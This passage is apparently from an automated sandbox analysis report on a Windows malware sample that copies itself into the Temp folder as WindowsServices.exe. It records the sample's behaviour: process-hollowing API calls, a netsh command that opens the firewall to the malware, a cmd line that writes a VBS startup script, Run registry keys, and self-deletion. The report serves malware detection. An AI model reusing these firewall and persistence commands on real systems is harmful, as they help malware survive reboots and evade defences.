        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: Window Recorder	Window detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
        Source: Binary string: caspol.pdbx source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr
        Source: Binary string: caspol.pdb source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr

        Data Obfuscation

        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 1_2_0040B0E0 push eax; ret 1_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 5_2_0040B0E0 push eax; ret 5_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 14_2_0040C074 push eax; iretd 14_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 14_2_0040B0E0 push eax; ret 14_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 18_2_0040C074 push eax; iretd 18_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 18_2_0040B0E0 push eax; ret 18_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 22_2_0040C074 push eax; iretd 22_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 22_2_0040B0E0 push eax; ret 22_2_0040B10E
        Source: initial sample	Static PE information: section name: UPX0
        Source: initial sample	Static PE information: section name: UPX1
        Source: initial sample	Static PE information: section name: UPX0
        Source: initial sample	Static PE information: section name: UPX1

        Persistence and Installation Behavior

        Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File created: C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File created: C:\Users\user\Desktop\iR2UtZj5vP.exex (copy)
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

        Boot Survival

        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
        Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File deleted: c:\users\user\desktop\ir2utzj5vp.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 1_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,LPtoDP,GetMapMode,DPtoLP,GetWindowRect,1_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 5_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,LPtoDP,GetMapMode,DPtoLP,GetWindowRect,5_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 14_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,14_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 18_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,18_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 22_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,22_2_0040A440
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
